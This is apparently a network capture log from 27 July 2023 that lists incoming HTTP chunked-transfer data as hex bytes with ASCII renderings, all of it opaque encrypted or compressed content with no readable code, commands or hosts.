2023-07-27 18:19:34 UTC	629	IN	Data Raw: 32 30 30 30 0d 0a e9 93 f2 cc 49 7c b5 57 2b 75 fe 25 32 14 ac ff dc ec 0c 37 1d 5c 11 ea 37 8f 31 e1 26 be f6 43 a1 b4 bd 4d a0 0c fe cf e1 a8 98 0b df 56 5e 11 18 aa 49 49 5f 87 00 d1 53 5b f5 12 2b c2 03 c3 14 21 58 3b 96 3b f9 ab 44 e8 2e 42 0c 75 a8 5c 04 d6 54 c8 8b cf 42 4b 54 e5 92 ad 97 c5 b5 5f 93 b4 4b 14 ad e7 10 dc a3 ab e0 50 17 b6 26 57 fd 40 32 6e e4 52 ef 39 3f 97 7f d4 33 33 00 59 e6 d7 30 e4 42 3e 24 89 5b 71 54 d2 9b c7 f8 b3 a4 32 3f d4 fe c2 75 c1 32 02 4b da 69 89 c5 d9 35 81 2f 55 0a fc 3e 57 db 75 1b 18 8e 60 ff 4a b2 2f 53 96 e9 83 f0 31 10 39 38 7a d3 36 7b bf 60 57 2d f6 ef 4a 0f 23 cc fd b8 ef 7a 49 e2 18 69 2e 36 07 83 d5 c1 e0 29 4d 15 3f 26 28 37 71 c0 6c 3c 10 dd fa 28 d7 e4 1b cc 9a 21 ab 2a 86 61 dd a2 dd 9d c8 be a6 c9 Data Ascii: 2000I\|W+u%27\71&CMV^II_S[+!X;;D.Bu\TBKT_KP&W@2nR9?33Y0B>$[qT2?u2Ki5/U>Wu`J/S198z6{`W-J#zIi.6)M?&(7ql<(!*a
2023-07-27 18:19:34 UTC	637	IN	Data Raw: a1 9f 44 21 fa 20 Data Ascii: D!
2023-07-27 18:19:34 UTC	637	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	637	IN	Data Raw: 31 66 66 38 0d 0a 7d be cc 70 66 4a 7c fc 3e 23 b3 22 50 f7 3c b1 e7 04 a4 de 70 00 2a 78 25 ef 86 80 2d 37 a9 ef 7f 67 37 44 79 90 43 54 5f 7c 12 55 d0 8e c8 7b 56 db 20 f6 4b c1 d1 0b 06 81 50 24 ce 82 a3 c4 c5 56 e4 c1 cf fe ee d3 de 7c d7 e5 7c 82 1f 9b cb 71 4a 7c 8d 4c 49 61 be 20 c3 da 5f 34 39 1a 08 8a ee e2 62 73 b4 05 a7 5b 3c 3b 31 31 19 a1 96 9f 14 f7 59 6e c5 5b 00 e3 6a 96 03 3c a9 98 2e 66 7f b6 3d 61 a6 f0 d4 62 7b 51 5d 01 78 d7 1f 63 ad 35 d4 5a 96 91 da 87 41 cb 7c 91 26 de ad f3 ba 07 db 2f 33 37 e9 f4 ee 4d 85 fe 58 aa 3d c9 d3 5d a4 b8 2a 8d c8 f4 67 fe b8 c1 60 4b 1a c2 1a dd e1 b6 06 83 fc 6e c5 25 01 84 dd 85 e1 f9 38 e4 be 51 88 16 2a 8b 43 82 01 0f be 2a 8c a8 50 f0 85 30 a5 f7 a0 68 86 7f 51 9e 9c b1 89 d9 5f 7b 0f 91 2d cf e8 Data Ascii: 1ff8}pfJ\|>#"P<px%-7g7DyCT_\|U{V KP$V\|\|qJ\|LIa _49bs[<;11Yn[j<.f=ab{Q]xc5ZA\|&/37MX=]g`Kn%8QCP0hQ_{-
2023-07-27 18:19:34 UTC	645	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	645	IN	Data Raw: 70 3e 29 00 20 38 6e 91 17 44 1f c3 12 bc c0 e2 d7 27 bb e4 50 42 b1 af 1f af 54 2f 36 bb b5 9e 68 df c0 dd 52 f1 c0 8e ed d4 5d 9f 4b 5e 21 08 b9 15 b1 49 07 ec 82 92 bb 42 1a b3 41 26 a9 14 62 b4 1f b9 37 e9 8c 23 cb de 41 b6 83 f6 a6 b1 e0 21 47 f8 2d f3 07 f5 e7 d5 1f 7f e3 83 c7 33 d8 75 90 f9 ca 86 db d4 73 bd ec 3f 14 0f 50 c0 3a 94 34 30 f1 4c 07 f3 e6 b6 25 ab 8d 09 bf 1b 90 f4 33 0f b1 db 95 3a d6 44 8d bd fb 55 1b 42 fd f6 31 ae 69 c9 d3 31 56 ac 0f c4 98 50 59 f9 90 03 fb ed f3 de 0a d7 7a 2c 3f fd 93 1b 23 a5 5c cd 49 17 84 79 1f 74 97 21 dc a0 1d e0 a7 45 bd 56 25 9b c0 07 e3 c6 8f 51 b0 50 19 6d 06 fe c6 0c 84 2f 53 1c d4 7c f1 3c aa 06 2b 09 b5 73 76 7c 41 a6 81 93 39 b9 67 41 8c 55 e4 16 52 d6 d7 3a d7 5f 36 c2 3c 21 ce c6 a1 38 2e 91 a9 Data Ascii: p>) 8nD'PBT/6hR]K^!IBA&b7#A!G-3us?P:40L%3:DUB1i1VPYz,?#\Iyt!EV%QPm/S\|<+sv\|A9gAUR:_6<!8.
2023-07-27 18:19:34 UTC	653	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	653	IN	Data Raw: 32 30 30 30 0d 0a e0 0f 28 4a 0f d4 55 44 bc 67 90 6d 86 ad 47 3c be a2 87 ab b0 60 1a a1 0f af 5d 13 ab fc ce df 25 60 a7 f2 3a 8f d0 2a 73 96 af 43 08 57 32 f3 47 8d 7c 39 6c ec 3a 9f 95 02 66 59 e4 55 4b b8 07 b6 2f 56 46 96 6a e5 7e 8f 93 84 ae fd 81 04 fb be a6 dd 49 f1 c3 1d cb 02 c8 fa 83 67 61 69 f5 46 0f 4c 7a a8 df 6a b8 be 42 df ad 29 87 85 23 48 25 96 5f 3e 81 83 b8 ac ec ac f2 88 ff 49 8f c0 a1 c7 9d c9 71 21 9d 6d 31 97 7c ac cc b2 d8 ca 51 81 f6 b2 04 49 84 7e ec 28 45 7b e7 b1 99 bd 4b be 02 a3 bf 83 54 6a 73 73 68 d5 03 3f 67 b9 46 f1 33 cc 1a 3e f1 50 30 f5 5d d8 ad 06 8f 52 26 ae ad c1 09 ee 18 e8 5a 07 19 4b 16 1b d8 25 eb 77 46 94 37 a6 54 e2 d9 16 93 ba 9f 45 6f b4 c9 d7 1b 6f f0 a0 e6 1e 24 da 29 0e 51 31 c6 70 70 6b fd 40 e2 37 90 Data Ascii: 2000(JUDgmG<`]%`:*sCW2G\|9l:fYUK/VFj~IgaiFLzjB)#H%_>Iq!m1\|QI~(E{KTjssh?gF3>P0]R&ZK%wF7TEoo$)Q1ppk@7
2023-07-27 18:19:34 UTC	661	IN	Data Raw: e0 8c 17 32 20 c6 Data Ascii: 2
2023-07-27 18:19:34 UTC	661	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	661	IN	Data Raw: 32 30 30 30 0d 0a b6 3b 1b 53 b5 03 69 65 46 8e 77 41 ae 84 94 01 a6 fd 63 9e 4f b4 d0 13 10 40 88 ce 74 0a 3c 8d 35 e9 2a f7 98 f6 b5 b5 16 75 15 76 cd 5b 04 73 60 7a 0d 0e 66 61 fc 4d 98 a8 b8 15 0d 8b b4 b0 d0 c5 19 a7 33 d5 94 36 86 9e d9 68 f9 cb 66 c1 1b a6 ba 34 ff fe 49 3b 48 6f f5 a9 be 25 18 ba 1d ca 21 af 84 da a6 f6 eb 73 c3 97 e4 c9 7c f7 42 e0 42 fb 4d 5e 19 c6 05 b1 a0 eb 9c 16 da 81 ea f1 fd ca 2b ba 9a 79 23 20 d9 77 34 78 4c 2b 09 ed 87 a6 b9 34 da 50 39 83 15 f6 75 0f f5 26 21 05 85 a4 13 10 f0 bc ec 42 d6 c7 5a 1b 07 89 82 43 27 37 8a 90 03 d9 b9 5c a4 56 c3 38 de 34 fc 56 65 70 64 e9 16 75 70 b2 f3 00 21 22 fd b2 77 2c 96 77 0c ef 7e 80 13 47 6d 91 07 37 1a 98 71 63 0f 84 68 4b 52 0f 5b fb 17 42 17 96 52 1c 1a 90 9a 60 f3 ae 83 3f 52 Data Ascii: 2000;SieFwAcO@t<5*uv[s`zfaM36hf4I;Ho%!s\|BBM^+y# w4xL+4P9u&!BZC'7\V84Vepdup!"w,w~Gm7qchKR[BR`?R
2023-07-27 18:19:34 UTC	669	IN	Data Raw: f6 53 0e d4 dd a0 Data Ascii: S
2023-07-27 18:19:34 UTC	669	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	669	IN	Data Raw: 32 30 30 30 0d 0a cb fc 83 6d 44 4f 00 0e 77 fc 84 82 a8 fb f9 bc cf e2 63 ed b9 df 72 cd af 37 67 81 e4 b6 89 d3 e5 7a 65 69 cd 41 05 80 9b 0b b3 16 25 35 c3 1c c6 56 77 c8 14 b1 79 44 85 0d 10 09 f8 05 30 46 e3 0f e7 56 84 c4 3a 15 5a 0a 99 e0 12 c7 98 0e f5 9f 9b 87 a6 a9 57 e0 da 3f 4b 2f e3 47 36 b7 a5 00 fd 03 0a b4 22 75 e0 6a 0a 97 7a de 33 94 a3 26 4d 0b 54 39 bd 22 eb 7f da 74 2a 43 9f 74 a0 68 44 9f b1 53 5d 95 dc 44 3d 8c 79 0b 50 31 ba 63 29 1b e9 2b 6d 01 6c c7 26 cf 84 5e 33 20 2a 4a 4a 5b 75 70 81 7c 8f 86 41 eb e9 84 ab 7b b1 3f 3d c5 3f 37 e7 b8 c7 a3 e7 9f 99 56 ce 0d 67 cf 56 4c 8d b9 72 0a 2e 23 dd 77 76 a2 08 14 db a2 49 d8 db 63 85 ed 1f ce 1a 4b f1 0f a3 2c 56 a1 77 b0 7b 60 0a 97 ac 2b e1 77 96 a2 4d d9 eb a2 c4 3a e7 3b f6 a7 0d Data Ascii: 2000mDOwcr7gzeiA%5VwyD0FV:ZW?K/G6"ujz3&MT9"tCthDS]D=yP1c)+ml&^3 JJ[up\|A{?=?7VgVLr.#wvIcK,Vw{`+wM:;
2023-07-27 18:19:34 UTC	677	IN	Data Raw: 64 1a c3 b3 91 76 Data Ascii: dv
2023-07-27 18:19:34 UTC	677	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	677	IN	Data Raw: 32 30 30 30 0d 0a a9 e8 9c 1b 04 e6 ec 01 ea 2a 53 6f d8 6d cc 84 87 85 5c ce 26 c3 9f b4 6a 57 81 63 88 2c a0 1f 72 bb d1 a5 70 bc 27 a2 d9 b0 98 9f b4 79 65 b9 df ec 9c 41 d8 31 1c 50 2d fe 90 47 5c b8 51 2a 1c e8 9d dc 55 d7 ed 3c 2f a5 62 43 3f 9a 37 94 0c 4a 5b 7f 9a f5 ae 31 c6 12 d6 14 9c bc 71 b4 11 b0 e7 33 16 63 f6 1d d9 23 75 74 6b 3b 8e e0 ac 9b 5f 3e 94 5c 0f 47 1e ee 68 b7 14 90 86 91 ba a7 a2 fb c5 d5 26 9e ce fa be 24 5e 0b 34 4a ef d0 ba 65 30 bf 0d 2f 5c f6 09 97 8a 3a 95 4f ed aa b0 ea 5e c9 73 78 65 5d c5 f4 8e 75 f7 b1 ac e6 5f 0f 04 8c a9 7d cc 8a 6e 6d b2 08 2c fe 79 a3 8d 23 78 e4 9b d5 89 ad 04 fb 6c ec 13 5b af f2 1a a5 ef 23 7d 67 54 50 f7 6b ff 1f e5 80 58 64 be ac 89 40 fb ad 6a d2 5d 4a 67 f3 8c 76 c6 fd 87 55 18 3f ef 34 28 Data Ascii: 2000Som\&jWc,rp'yeA1P-G\QU</bC?7J[1q3c#utk;_>\Gh&$^4Je0/\:O^sxe]u_}nm,y#xl[#}gTPkXd@j]JgvU?4(
2023-07-27 18:19:34 UTC	685	IN	Data Raw: 02 93 4c 1d 87 4e Data Ascii: LN
2023-07-27 18:19:34 UTC	685	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	685	IN	Data Raw: 32 30 30 30 0d 0a 88 0d ea af 89 3b 17 27 f5 7f b3 aa ff 7d b2 25 e7 ed f6 ba 59 e8 3e ab f2 c1 fd 41 fc 1c ae 47 b1 41 41 08 fe e3 04 34 c3 9f 04 bd 38 73 c0 1d 23 33 60 5f 06 b5 cd c8 81 25 89 a6 4a f7 7d a1 01 23 9d 6b 46 1b 80 db d4 fc be f9 c0 b3 3e 70 95 18 6a be 66 5a 95 ee 93 42 44 68 5d ad 34 74 32 33 ef 18 ff 7c 10 82 e4 3f 08 7b ba 2a 6b e9 b2 0b 7f 54 7d 0a 1d 89 d4 91 fc 18 da b7 8a 2e d9 36 4d 75 ca 40 16 fa a6 d0 e5 ed 2a 98 15 6b db 07 77 94 b4 3f d7 ad 68 88 aa 82 38 bb 73 d2 1f 5c a9 9f c2 6a 39 28 a6 37 ea fd f2 25 91 ef f1 b2 06 37 80 ee 07 b3 de 70 50 1d 0f 94 0b 1a 41 41 1b 71 f7 8f 6a 2a db 6e 0a 24 c6 bd e4 e0 81 3a d7 3d 5b ce fb 8c 6f af e7 bd 10 7e 88 59 8f d2 a2 29 55 2d 99 b0 92 08 76 a3 e6 d5 4c f8 11 5c 7d 1f dd 2b 2a cf cc Data Ascii: 2000;'}%Y>AGAA48s#3`_%J}#kF>pjfZBDh]4t23\|?{kT}.6Mu@kw?h8s\j9(7%7pPAAqjn$:=[o~Y)U-vL\}+
2023-07-27 18:19:34 UTC	693	IN	Data Raw: 79 79 ed e1 7c f6 Data Ascii: yy\|
2023-07-27 18:19:34 UTC	693	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	693	IN	Data Raw: 32 30 30 30 0d 0a c3 4e ef 5e fb c3 3c d9 31 bd 94 46 fd 03 1a a4 7e d4 e0 53 b5 89 87 7e 1f a4 1d 5e 0d 71 88 0b d1 28 8e 02 a0 97 4f da 6d 9d ae 45 e8 ec 94 42 19 e6 9a 3a 81 37 a6 43 6d 99 b3 e1 10 3d 1c 1e 1f b1 dd 78 71 ad 77 3b 33 59 99 c7 2b 5b 8b 32 a2 77 6b 17 8d 53 02 9a a8 9d d2 8a 7d 72 96 80 a9 16 e8 b0 46 91 d1 1a 68 6c 54 14 c5 c6 cd 89 13 03 d8 ca ff 9c 6c e7 47 8c bb eb ca 68 cf 07 de f5 b3 bc a4 34 8a 1a 68 da 23 95 d3 b9 54 d7 dd 4b f7 c7 4f 5d 54 f9 8e bc f3 64 cb 9d 6c b7 c6 39 c8 87 a5 c5 97 89 cd 28 c4 e3 f1 18 67 e5 be 4e 47 8d 00 79 0d 5b 88 83 03 1e 94 64 43 ee 01 08 ef 97 df b7 c3 29 2e 00 8d 7e dd 1c 5a ea 47 84 c5 45 d6 5c 52 fd 95 80 f4 11 16 c0 89 9c ec 43 1f 59 35 d1 e7 f9 f2 c5 2b c6 fa 9a 4c 4d 3e 14 48 f0 1f df 82 89 14 Data Ascii: 2000N^<1F~S~^q(OmEB:7Cm=xqw;3Y+[2wkS}rFhlTlGh4h#TKO]Tdl9(gNGy[dC).~ZGE\RCY5+LM>H
2023-07-27 18:19:34 UTC	701	IN	Data Raw: e8 2a 0a 12 65 30 Data Ascii: *e0
2023-07-27 18:19:34 UTC	701	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	701	IN	Data Raw: 31 66 66 38 0d 0a 49 03 af f6 14 18 9f 01 7d fa 12 5b 47 de c1 25 a2 8e 68 80 89 34 89 2e 83 3b aa 25 c0 0a 1f f7 2e c6 1d bc fd 8b ca 88 87 90 55 44 84 0e 30 15 30 dc 45 55 da eb 72 ed 94 ad be bb f3 64 a2 1d 9a 1a 7a e9 02 a7 da 5f 61 c1 a7 72 c8 5e 61 88 f6 e0 a3 2e f5 0a fa f7 d7 38 77 24 59 70 8e 7d d4 ea 4b b4 8b a9 66 ab 54 8e e3 9d 10 3e 07 e5 85 cf 83 03 d5 aa fb 0b d2 cd ae 43 1c 04 50 c7 b2 76 f7 d7 8b 60 03 e0 05 48 b4 f1 8c 1f 01 c3 3d 17 21 1e b4 de a0 4e 4e 51 d5 3c 06 91 1e e0 70 7a 1a 66 85 3f 61 4f eb 4a e7 06 3b 6f df 7f a1 3f 6d 7e f1 6a 26 7c 9d cf 5a 8f 57 e8 71 2e 0d a1 31 cb 6e cb 80 89 6c 61 cb 06 4b 62 54 a7 3d 0e 76 54 ab 91 54 fc 4d f2 1c 2d 6e 89 f9 47 46 41 2c 1c 74 6d 93 95 0b 95 ca ac 18 a0 aa 13 5c 93 ba e7 16 5a 7f cf 52 Data Ascii: 1ff8I}[G%h4.;%.UD00EUrdz_ar^a.8w$Yp}KfT>CPv`H=!NNQ<pzf?aOJ;o?m~j&\|ZWq.1nlaKbT=vTTM-nGFA,tm\ZR
2023-07-27 18:19:34 UTC	709	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	709	IN	Data Raw: 56 ef b8 66 6c 10 ac 93 2e 8e 1b 66 ff fa f0 a2 2b 4f 66 44 12 0c eb de 31 9e 7b 94 3d b1 3e a1 8a 9e a1 bf a9 88 2e 23 ae cc 84 1b 57 69 4d 07 e1 6d 50 ba 54 e6 d6 b9 a0 28 cc 25 4b 65 82 9c 9e 6a f1 66 bd 5c ed c5 cc 6f 74 67 0b 9e 49 3c cc 53 ef 2b 59 a1 49 94 10 6a 4a 54 d0 0a d7 2a 72 9c 7f 12 a6 f7 5a ed ad 45 f2 b2 5d 3f f3 bf 0e 4d 3d 60 0f bd 2e 45 ed 1f 01 be 5f 8d 94 9c a4 19 aa 7b 59 30 08 59 59 b3 22 43 b8 70 5f 8a 8d f9 f4 d5 83 8b 75 20 8d fb 64 74 bd 40 67 dd f8 4b b9 e1 31 53 0e 2a ea d2 ee 35 9c 4e 09 b7 29 ad d8 b5 59 f4 9c fb ab 36 f3 25 bf fc 12 b0 ff b8 2e ee 84 4f 11 ce 82 49 c8 b7 e2 4d cc 20 5a 7c 77 15 79 24 a6 14 b3 97 2b 8a 1b 98 4f bc 3c 37 ba 16 0d 5d 94 a4 9f 41 31 f3 18 66 0d f9 21 40 1e ab df 17 c1 65 b8 56 ca b9 65 f9 b3 Data Ascii: Vfl.f+OfD1{=>.#WiMmPT(%Kejf\otgI<S+YIjJTrZE]?M=`.E_{Y0YY"Cp_u dt@gK1S5N)Y6%.OIM Z\|wy$+O<7]A1f!@eVe
2023-07-27 18:19:34 UTC	717	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	717	IN	Data Raw: 32 30 30 30 0d 0a 4c 0f 56 44 c9 5a fc 68 04 20 ec f9 5f e9 75 56 f8 aa 96 c9 fa c5 7b 31 43 99 6c f9 1d a8 ca 8f e5 f1 63 98 19 95 26 6d f8 dc 63 2b 13 ff 1e b9 27 2b 11 c4 56 d8 a6 09 37 7d 27 f6 82 74 1a 61 c9 b2 f4 a4 63 4d be ac 46 7d b8 87 af 8e e9 d1 66 50 67 f1 2f af 8b 55 ac 70 ce ae c4 23 51 fd 8d b8 48 12 a6 10 0b bd 1d bb de 0e 33 46 94 4e 96 bd 00 a5 0c 4f 07 14 e8 c1 f8 05 56 7a 19 c4 98 e4 a9 70 75 24 b9 2f db 1c c6 1a 4c 08 62 2f d2 c7 71 73 4c 4b 20 bf ea f2 2b 6e a3 a5 a9 ab 92 11 32 d2 49 ae 82 81 87 92 c8 7d 33 f8 3d 96 de b0 79 eb 5a e3 ed 27 8b 53 ca 2e ee ad 1a 48 1e 7b 18 c8 9a 58 03 a9 8a 27 cc e0 1f ca d4 1c 34 b1 f4 aa 39 c4 21 91 ef 34 1d 3c 33 f7 ba 19 18 68 f6 09 49 c2 45 7a 77 09 50 d1 79 91 01 ee 4f c9 a1 a8 c3 ee f6 92 47 Data Ascii: 2000LVDZh _uV{1Clc&mc+'+V7}'tacMF}fPg/Up#QH3FNOVzpu$/Lb/qsLK +n2I}3=yZ'S.H{X'49!4<3hIEzwPyOG
2023-07-27 18:19:34 UTC	725	IN	Data Raw: cc 09 5d 39 e4 b9 Data Ascii: ]9
2023-07-27 18:19:34 UTC	725	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	725	IN	Data Raw: 32 30 30 30 0d 0a fa 5e f4 13 24 9d e0 f1 6a 21 c1 00 41 7c d9 3b b9 88 a1 c2 8c bd 54 f1 f6 a0 3f 90 0c b2 84 bf 51 28 05 19 ed 7a 92 88 73 0c e1 b6 09 67 55 48 82 97 56 1c 06 53 ef a6 bb a8 36 4a 3c 97 d7 6f 28 75 56 d7 7b 4a 24 08 0a 42 f7 2a 67 e0 16 53 13 a9 ea d7 77 d4 b6 2d 5b 58 c7 82 f8 17 75 a0 a2 a8 10 e4 df 95 17 a2 0b 45 06 eb 91 e2 74 20 a6 64 a6 fa 2e ed 46 9a f9 4c b5 ac 57 a8 fa 81 ef ef f1 d4 e3 9b 24 52 cb 46 60 c7 be 0e e7 56 a4 66 fd 50 7f 42 21 79 f1 e6 c9 9d 4a a1 1c 15 85 8d 00 11 8b 6f 6e 01 76 82 9d 3d 2d 12 b0 5d cb 1b 54 3c fa d0 8a 38 15 25 ac 42 3d b7 dc dc 83 8b 35 af e5 15 90 06 47 d2 d2 2b ff fd 9f 2f 9a a5 3a 7e 6d 6a 30 a1 bf 20 2f 25 29 9d 84 fd 77 53 17 9f ce 77 90 7d 8d d6 41 69 35 71 e5 09 4c 5c 12 b3 75 1d 10 00 46 Data Ascii: 2000^$j!A\|;T?Q(zsgUHVS6J<o(uV{J$B*gSw-[XuEt d.FLW$RF`VfPB!yJonv=-]T<8%B=5G+/:~mj0 /%)wSw}Ai5qL\uF
2023-07-27 18:19:34 UTC	733	IN	Data Raw: 9a 1f 97 cf b1 2a Data Ascii: *
2023-07-27 18:19:34 UTC	733	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	733	IN	Data Raw: 32 30 30 30 0d 0a 23 1e d6 f4 a2 81 64 2a a4 17 12 95 ac 22 16 6e 1c c1 48 7b 41 c8 f5 e2 c2 01 11 62 ff 27 02 04 23 b3 d5 7f 26 8f a7 4b de 17 d0 54 68 81 5c 1c 6e 4e c6 88 ca 9a 58 42 c2 fd 8d df 1d 89 12 c9 ea 0b a2 dd 75 2d 76 50 2b 49 61 51 2b 27 89 50 d3 af b1 a1 9a 0d 7f 63 fe cb dc 11 19 30 1a 7a 3f 5d d5 16 88 4b f0 cc bf ee 8c 5a 32 c8 c2 5d a8 d5 01 b9 05 64 c7 3b 84 8f 51 bf e5 70 bb 43 68 93 8d 55 46 aa ce ca 49 d5 24 42 10 69 96 ae a8 5e 88 37 15 b9 4a a4 17 81 bb d5 ea 0f 11 25 e1 3b da 45 65 f0 6c 07 9f 43 6a cd 12 0c 78 80 5d 8a 2b a0 33 d2 64 51 dc 02 8c 29 6c a3 54 ff d5 41 2e c1 3c bb 92 db 94 1d 1e 67 4d ae 28 dd c1 7e 86 f3 05 9b 26 37 9e e0 04 5f b2 e2 80 bf 7b 07 b6 b6 8d 95 c1 45 64 95 91 87 c0 7e e2 cd be 1d f6 1a 27 e4 b5 e9 b8 Data Ascii: 2000#d*"nH{Ab'#&KTh\nNXBu-vP+IaQ+'Pc0z?]KZ2]d;QpChUFI$Bi^7J%;EelCjx]+3dQ)lTA.<gM(~&7_{Ed~'
2023-07-27 18:19:34 UTC	741	IN	Data Raw: 95 5f d5 f4 71 2d Data Ascii: _q-
2023-07-27 18:19:34 UTC	741	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	741	IN	Data Raw: 32 30 30 30 0d 0a 18 b7 a5 80 89 f8 e8 ce f3 42 bf e9 f9 9b 16 9c 9c e8 57 50 83 d0 b5 7c bd 45 05 44 2d ef 07 55 57 36 59 b7 58 0c ce 61 7d f5 d1 cd 95 2b 75 b2 4c 56 00 87 9e 45 fd ff 03 0c b6 89 ef eb 99 17 29 81 a5 7d fc ea 23 e1 c4 ed f1 9b c6 bb 57 03 0e 06 89 2a 7e d3 26 47 25 6f c0 02 90 29 c5 a3 88 20 2d 56 5b fb 58 d5 fd b9 92 6f 41 b5 ee f9 8d 60 79 1b c0 ea e3 af c2 3d c5 59 5c 9e 97 88 ce cf 8f 1f e2 27 4d b9 95 d1 a1 55 20 16 14 39 63 46 d9 9f cf 59 a8 02 65 5f b1 4b 85 aa 2b 84 96 66 5c 5c 69 39 2b d4 06 d7 01 12 0a 75 9e 23 06 3f 1f 83 dd 81 c2 23 de 69 15 0f 3d 5a 3a ae 3c 4c 6a 0b ac 31 de a4 1c 8b 77 dc c0 65 0e d1 06 37 1b 97 9f cd dd 45 94 47 b2 a0 84 cf cb 15 1d e9 ee f4 87 70 1f d6 cf f3 ad 54 41 b5 09 a9 c5 71 a4 23 35 85 b0 b5 d9 Data Ascii: 2000BWP\|ED-UW6YXa}+uLVE)}#W*~&G%o) -V[XoA`y=Y\'MU 9cFYe_K+f\\i9+u#?#i=Z:<Lj1we7EGpTAq#5
2023-07-27 18:19:34 UTC	749	IN	Data Raw: a0 f8 ca f4 3b 0f Data Ascii: ;
2023-07-27 18:19:34 UTC	749	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	749	IN	Data Raw: 32 30 30 30 0d 0a 77 c8 18 eb 19 76 e7 e2 6d 5d 34 83 bc 6e d6 28 e9 5d 8e f8 8d 3a 39 11 04 22 50 20 21 64 37 1e c6 55 ce 2f 1f c5 c1 b6 a7 63 02 1b 7c 3b a4 dd 13 b0 a7 c5 56 1c 5f 8e 60 a8 70 d2 52 13 cb 3e 25 20 57 6f 79 18 0f 44 ce 54 53 e0 e7 e8 3a f0 c1 ef 09 d1 ae 94 3c 58 1b 8e 65 08 7d 8b 0c 02 d8 02 b7 ea d3 c7 c9 61 46 07 83 20 1d 42 81 e0 f6 f3 f6 e8 ef 36 d0 7a d2 e5 40 98 66 57 18 37 bc 32 ea b1 e7 3c a2 c9 e5 b3 f4 63 17 fd 01 fd cd 8e 7b 02 8d 17 38 e7 e1 e6 09 c3 68 64 7f 22 f0 f6 40 f9 fa 80 16 50 c5 e9 de 61 ed 3d ef d3 d4 9c a2 d3 97 ba a9 e1 34 3a 21 9a 3a 51 b4 b6 2a 1a e2 89 c1 ba 92 0e 93 e6 24 3b ea d3 fd 80 ba db ad 8f 5d a3 f2 1c 88 a3 c8 ad 2b 21 78 4c 44 6a 92 f0 1e cf c0 9e 6e 8e 81 be 66 4b 23 60 8d a1 c7 bb 19 6e cc 27 5d Data Ascii: 2000wvm]4n(]:9"P !d7U/c\|;V_`pR>% WoyDTS:<Xe}aF B6z@fW72<c{8hd"@Pa=4:!:Q*$;]+!xLDjnfK#`n']
2023-07-27 18:19:34 UTC	757	IN	Data Raw: ca 25 18 88 24 42 Data Ascii: %$B
2023-07-27 18:19:34 UTC	757	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	757	IN	Data Raw: 32 30 30 30 0d 0a 68 f1 cc ce d2 f3 43 6d b3 16 0c e3 34 bc d5 bc e3 7f 5b e4 66 d2 7c 6d fb 22 1c 2e 72 98 66 d9 82 27 1c 59 7a b8 c0 d3 3c 78 8b da 00 31 d2 78 ec 96 ec 35 05 71 6e cc 77 f0 ea b6 bf 44 ad 72 27 a1 5b 0d 60 dc ac 9b 5a 0a ad b6 7d ac b5 44 61 5a 10 2a 13 a4 e4 c6 99 f8 b4 df 3a 3c e5 5a c0 c6 69 d5 42 36 ba c7 02 43 34 f1 9a 67 95 26 e5 1c 30 16 bf 3e d2 7e 58 5a df ca 15 c2 71 99 93 07 b0 17 0b 33 d6 52 18 93 24 5b 65 7c 14 df 46 af 43 e4 fa 22 b6 4b 69 81 5f bc 42 b1 46 84 20 a1 6b 15 ee 53 a2 18 2e 1f a7 83 8b 9e 44 36 e6 91 16 58 8c fd 04 cd ab d1 db 42 91 77 b9 5d 39 1a 30 d6 56 3a 88 dc 27 e2 2a 7c 05 5d 29 ec 6c d9 68 6c f3 a0 7e 5c e0 a0 bf f5 6d 75 81 8c b0 11 31 cb 85 ca fd ff c2 06 be f6 bb 82 f2 e8 cd f0 56 14 83 43 e8 24 1a Data Ascii: 2000hCm4[f\|m".rf'Yz<x1x5qnwDr'[`Z}DaZ:<ZiB6C4g&0>~XZq3R$[e\|FC"Ki_BF kS.D6XBw]90V:'\|])lhl~\mu1VC$
2023-07-27 18:19:34 UTC	765	IN	Data Raw: 2f 96 40 69 fd 30 Data Ascii: /@i0
2023-07-27 18:19:34 UTC	765	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	765	IN	Data Raw: 31 66 66 38 0d 0a 42 b5 14 c2 09 0b 82 ff f9 b3 b6 46 a8 15 90 06 03 05 f7 d3 ce e3 52 69 8e b6 f5 27 f3 b8 01 f7 00 7f 8e 2b 32 db af 80 5a d2 91 37 4b 71 f8 0b b2 c6 cb b7 ec 28 19 40 51 c0 a0 fa 2a 08 fb 78 3a 54 33 53 d5 8a 55 56 6b e7 96 73 6e 41 60 21 74 cf 88 ce b5 9e 90 dc 50 75 3e 6b b2 54 56 2c 6e 6a 4f 18 8d 63 b3 43 fd 8f 2e 99 b1 d6 e0 a2 45 21 ac d5 a6 10 55 e2 87 ba 03 63 e9 a7 9a 5f 43 d0 1d d5 e1 eb 46 ab 65 24 8b 53 73 2b 2f cd cc b9 93 30 20 e9 40 4d d4 fc a9 c5 88 44 67 89 6b 65 e6 75 af 74 3c c4 a4 77 0b 7c d6 27 7a 0d 8b 5b 72 0e 09 1b 1d 56 71 d1 d2 cf 11 fe bb b5 2f aa b1 ee 23 28 2b 75 ee cb ca 17 39 f6 84 57 69 bd c9 d9 56 dd fe 9a 83 d6 a4 e2 90 f1 b0 12 57 b3 b6 6c 05 0d cf fe a7 f0 c0 77 e7 85 ab 12 82 13 81 9a b9 c5 79 d6 57 Data Ascii: 1ff8BFRi'+2Z7Kq(@Q*x:T3SUVksnA`!tPu>kTV,njOcC.E!Uc_CFe$Ss+/0 